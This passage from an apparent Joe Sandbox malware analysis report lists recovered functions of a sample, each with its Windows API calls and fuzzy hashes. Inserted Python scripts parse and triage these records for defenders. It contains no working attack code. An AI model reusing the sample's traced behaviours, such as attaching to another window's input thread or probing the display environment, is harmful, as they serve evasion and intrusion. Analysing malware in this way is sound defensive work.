                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                              • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                              APIs
                                                                              • __wsplitpath.LIBCMT ref: 00436A45
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • __wsplitpath.LIBCMT ref: 00436A6C
                                                                              • __wcsicoll.LIBCMT ref: 00436A93
                                                                              • __wcsicoll.LIBCMT ref: 00436AB0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                              • String ID:
                                                                              • API String ID: 1187119602-0
                                                                              • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                              • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                              • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1597257046-0
                                                                              • Opcode ID: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                              • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                              • Opcode Fuzzy Hash: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
                                                                              • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3349847261-0
                                                                              • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                              • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                              • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                              • String ID:
                                                                              • API String ID: 2223660684-0
                                                                              • Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
                                                                              • Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
                                                                              • Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                              • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                              • EndPath.GDI32(?), ref: 004472B0
                                                                              • StrokePath.GDI32(?), ref: 004472BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                              • String ID:
                                                                              • API String ID: 2783949968-0
                                                                              • Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                              • Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
                                                                              • Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
                                                                              • Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 00417D1A
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __getptd.LIBCMT ref: 00417D31
                                                                              • __amsg_exit.LIBCMT ref: 00417D3F
                                                                              • __lock.LIBCMT ref: 00417D4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 3521780317-0
                                                                              • Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                              • Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
                                                                              • Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
                                                                              • Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471144
                                                                              • GetDC.USER32(00000000), ref: 0047114D
                                                                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0047117B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                              • Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
                                                                              • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                                                              • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
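The records above list, per recovered function, its API calls (with the memory dump they were lifted from and the similarity hashes). Two of them share the API ID CapsDesktopDeviceReleaseWindow and differ only in the GetDeviceCaps index argument, which the API ID does not capture. The following parser for that record layout is an added example, not Joe Sandbox code: the layout is inferred from the listing, the function names and the "plumbing module" triage rule are hypothetical, and the sample input is constructed from records that appear on this page.

```python
"""Parse the per-function records of a Joe Sandbox disassembly listing
('APIs' / 'Memory Dump Source' / 'Similarity' blocks) and triage them.

Added example; not Joe Sandbox code. Record layout inferred from the report.
"""
import re
from collections import Counter

# One API bullet: optional "Part of subcall function XXXX: " prefix, then
# Name.MODULE(args) ref: ADDRESS (the argument list and comma are optional).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# GetDeviceCaps index values seen in these records (wingdi.h constants).
DEVICECAPS_INDEX = {0x0C: "BITSPIXEL", 0x74: "VREFRESH"}

# Triage assumption: functions calling only CRT/GDI/USER32 are UI plumbing.
PLUMBING_MODULES = {"LIBCMT", "GDI32", "USER32"}

# Constructed sample in the report's plain-text layout (records from this page).
SAMPLE = """\
APIs
• GetDesktopWindow.USER32 ref: 00471144
• GetDC.USER32(00000000), ref: 0047114D
• GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
• ReleaseDC.USER32(00000000,?), ref: 0047117B
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
APIs
• GetDesktopWindow.USER32 ref: 00471102
• GetDC.USER32(00000000), ref: 0047110B
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
• ReleaseDC.USER32(00000000,?), ref: 00471139
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
APIs
• __getptd.LIBCMT ref: 00417D1A
  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
• __getptd.LIBCMT ref: 00417D31
• __amsg_exit.LIBCMT ref: 00417D3F
• __lock.LIBCMT ref: 00417D4F
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
APIs
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
"""


def parse_records(text):
    """Split the listing into records; each one starts at a bare 'APIs' line."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "subcalls": [], "associated": [], "meta": {}}
            records.append(rec)
            section = "APIs"
            continue
        if rec is None:
            continue
        if not line.startswith("•"):
            section = line  # 'Memory Dump Source', 'Similarity', ...
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                entry = {"name": m["name"], "module": m["module"],
                         "args": [a for a in (m["args"] or "").split(",") if a],
                         "ref": int(m["ref"], 16)}
                (rec["subcalls"] if m["sub"] else rec["apis"]).append(entry)
            continue
        key, _, value = body.partition(":")
        # Drop the 'Download File' link label the HTML export leaves on lines.
        value = value.replace("Download File", "").strip()
        if key.strip() == "Associated":
            rec["associated"].append(value)
        else:
            rec["meta"][key.strip()] = value
    return records


def decode_devicecaps(entry):
    """Name the index argument of a GetDeviceCaps call when it is known."""
    if entry["name"] != "GetDeviceCaps" or len(entry["args"]) < 2:
        return None
    try:
        return DEVICECAPS_INDEX.get(int(entry["args"][1], 16))
    except ValueError:  # '?' means the sandbox could not resolve the value
        return None


def summarize(records):
    """Counts that drive triage: plumbing-only records, module mix, and API IDs
    that recur (same call sequence, different function or arguments)."""
    modules = Counter(e["module"] for r in records for e in r["apis"])
    plumbing = sum(1 for r in records if r["apis"]
                   and all(e["module"] in PLUMBING_MODULES for e in r["apis"]))
    api_ids = Counter(r["meta"].get("API ID", "") for r in records)
    return {"records": len(records),
            "empty": sum(1 for r in records if not r["apis"] and not r["subcalls"]),
            "plumbing": plumbing,
            "modules": dict(modules),
            "recurring_api_ids": {k: v for k, v in api_ids.items() if v > 1}}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(summarize(recs))
    for r in recs:
        for e in r["apis"]:
            if decode_devicecaps(e):
                print(f"{e['ref']:08X} GetDeviceCaps({decode_devicecaps(e)})")
```

Records whose calls are all CRT or GDI/USER32 plumbing (the bulk of this section, consistent with MFC-style UI code compiled into the sample) can be set aside first; the injection and credential-theft behaviour flagged in the signatures above will be in records that call other modules. Note that the API ID collapses argument values, so the two CapsDesktopDeviceReleaseWindow records read as duplicates until the index (VREFRESH vs. BITSPIXEL) is decoded.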
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00471102
                                                                              • GetDC.USER32(00000000), ref: 0047110B
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                                                              • ReleaseDC.USER32(00000000,?), ref: 00471139
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 2889604237-0
                                                                              • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                              • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                                                              • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                                                              • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                              • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                              • AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 2710830443-0
                                                                              • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                              • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                                                              • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                                                              • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
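The records above (one function each: its API calls with resolved arguments and call-site addresses, the dump they came from, and an Instruction Fuzzy Hash) are what an analyst actually triages in this part of a Joe Sandbox report. As an added example that is not part of the report or of Joe Sandbox's own tooling, the following Python parses records in this layout, decodes a few argument values, and flags the API combinations a reviewer would look at first: the GetDeviceCaps(..., 0xC) call (index 12 is BITSPIXEL, the display colour depth, a common environment check) and the GetWindowThreadProcessId/AttachThreadInput pair (one thread attaching itself to another window's input queue). The sample input is constructed from records on this page; the heuristics and severity labels are the editor's, not Joe Sandbox signatures; the window-message names are Win32 header constants; and hash_similarity is a positional comparison of two fuzzy hashes, not the metric behind the report's Similarity field.

```python
import re

# Constructed sample: four records copied from this report's listing, trimmed
# to the fields the parser reads (API lines and the Instruction Fuzzy Hash).
SAMPLE = """\
APIs
• GetDesktopWindow.USER32 ref: 00471102
• GetDC.USER32(00000000), ref: 0047110B
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
• ReleaseDC.USER32(00000000,?), ref: 00471139
• Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
APIs
• SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
• GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
• GetCurrentThreadId.KERNEL32 ref: 004389DA
• AttachThreadInput.USER32(00000000), ref: 004389E1
• Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
• CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
  • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?), ref: 00438FC8
• Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
• Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@:]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
HASH_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*([0-9A-F]+)\s*$")

# Win32 header constants, used to decode the msg argument of SendMessageW.
WM_NAMES = {0x0143: "CB_ADDSTRING", 0x014E: "CB_SETCURSEL",
            0x1105: "TVM_GETCOUNT", 0x1132: "TVM_INSERTITEMW"}
BITSPIXEL = 12  # GetDeviceCaps() index for colour depth


def _hex(s):
    """Parse a hex argument; '?' means the sandbox could not resolve it."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_records(text):
    """Split the listing into records of {'apis': [...], 'hash': str|None}."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "hash": None}
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "args": m["args"].split(",") if m["args"] else [],
                                "ref": m["ref"], "inline": m["sub"] is None})
        elif (h := HASH_RE.match(line)):
            cur["hash"] = h.group(1)
            cur = None  # the fuzzy hash is the last field of a record
    return records


def triage_record(rec):
    """Editor's heuristics, not Joe Sandbox signatures: (severity, note) pairs."""
    names = {a["name"] for a in rec["apis"] if a["inline"]}
    notes = []
    if {"AttachThreadInput", "GetWindowThreadProcessId"} <= names:
        notes.append(("suspicious", "attaches to another window's input thread"))
    if {"UnloadUserProfile", "WaitForSingleObject"} <= names:
        notes.append(("info", "waits on a handle, then unloads a loaded user profile"))
    for a in rec["apis"]:
        if a["name"] == "GetDeviceCaps" and len(a["args"]) > 1 and _hex(a["args"][1]) == BITSPIXEL:
            notes.append(("info", "reads display colour depth (BITSPIXEL), a common environment check"))
        if a["name"] == "SendMessageW" and len(a["args"]) > 1:
            msg = _hex(a["args"][1])
            label = WM_NAMES.get(msg, hex(msg)) if msg is not None else "?"
            notes.append(("info", f"SendMessageW with {label}"))
    return notes


def hash_similarity(h1, h2):
    """Share of hex digits equal at the same position (positional proxy only)."""
    if not h1 or not h2 or len(h1) != len(h2):
        return 0.0
    return sum(a == b for a, b in zip(h1, h2)) / len(h1)


def triage(text):
    """One summary row per record: first call site, hash prefix, notes."""
    return [{"ref": r["apis"][0]["ref"] if r["apis"] else "?",
             "hash": (r["hash"] or "")[:12], "notes": triage_record(r)}
            for r in parse_records(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        for sev, note in row["notes"]:
            print(f"{row['ref']} {row['hash']} [{sev}] {note}")
```

Run stand-alone it prints one line per note. Keep the decoded SendMessageW messages in view when reading the rest of this section: TVM_INSERTITEMW/TVM_GETCOUNT and CB_ADDSTRING/CB_SETCURSEL are ordinary tree-view and combo-box traffic, consistent with the AutoIt3GUI string that appears in a later record, so a bare count of SendMessage calls is a poor signal; the input-thread attach and the profile unload are the call sites worth following into the dump.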
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                                                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                                                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                                                                • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                                                                • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              • String ID:
                                                                              • API String ID: 146765662-0
                                                                              • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                              • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                                                              • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                                                              • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                                                              APIs
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                                                                • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                              • __getptd_noexit.LIBCMT ref: 00414080
                                                                              • __freeptd.LIBCMT ref: 0041408A
                                                                              • ExitThread.KERNEL32 ref: 00414093
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
